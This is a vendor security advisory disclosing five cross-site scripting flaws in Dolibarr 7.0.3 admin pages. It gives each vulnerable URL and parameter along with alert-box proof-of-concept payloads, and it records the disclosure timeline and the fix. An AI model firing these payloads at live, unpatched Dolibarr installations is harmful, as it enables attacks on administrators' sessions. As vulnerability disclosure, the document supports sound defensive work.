Multiple Cross-site Scripting Vulnerabilities in Dolibarr 7.0.3
Information
Advisory by Netsparker (now Invicti)
Name: Multiple Cross-site Scripting Vulnerabilities in Dolibarr 7.0.3
Affected Software: Dolibarr
Affected Versions: 7.0.3
Homepage: https://github.com/Dolibarr/dolibarr
Vulnerability: Cross-site Scripting
Severity: Medium
Status: Fixed
CVE-ID: CVE-2018-13851, CVE-2018-13852, CVE-2018-13853, CVE-2018-13854, CVE-2018-13855
CVSS Score (3.0): -AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Invicti Advisory Reference: NS-18-015
Vulnerability Tree
/admin/const.php
(POST=constvalue)/admin/defaultvalues.php
(GET=mode)/admin/system/dolibarr.php
(GET=leftmenu)/admin/system/dolibarr.php
(GET=mainmenu)/admin/translation.php
(GET=mode)
1. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/const.php
Parameter Name: constvalue
Parameter Type: POST
Attack Pattern: x" onmouseover=alert(0x00D43C) x="
2. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/defaultvalues.php
Parameter Name: mode
Parameter Type: GET
Attack Pattern: x" onmouseover=alert(0x00D43C) x="
3. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/system/dolibarr.php
Parameter Name: leftmenu
Parameter Type: GET
Attack Pattern: <scRipt>alert(0x00423B)</scRipt>
4. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/system/dolibarr.php
Parameter Name: mainmenu
Parameter Type: GET
Attack Pattern: <scRipt>alert(0x00423B)</scRipt>
5. Technical Details
URL: http://{domain}/{dolibarr_path}/admin/translation.php
Parameter Name: mode
Parameter Type: GET
Attack Pattern: x" onmouseover=alert(0x00D43C) x="
For more information on cross-site scripting vulnerabilities, see Cross-site scripting (XSS).
Advisory Timeline
29th November 2017 – First Contact
12th July 2018 – Vendor Fixed
26th October 2018 – Advisory Released
Credits & Authors
These issues have been discovered by Omer Citak while testing Invicti Web Application Security Scanner.
About Invicti
Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.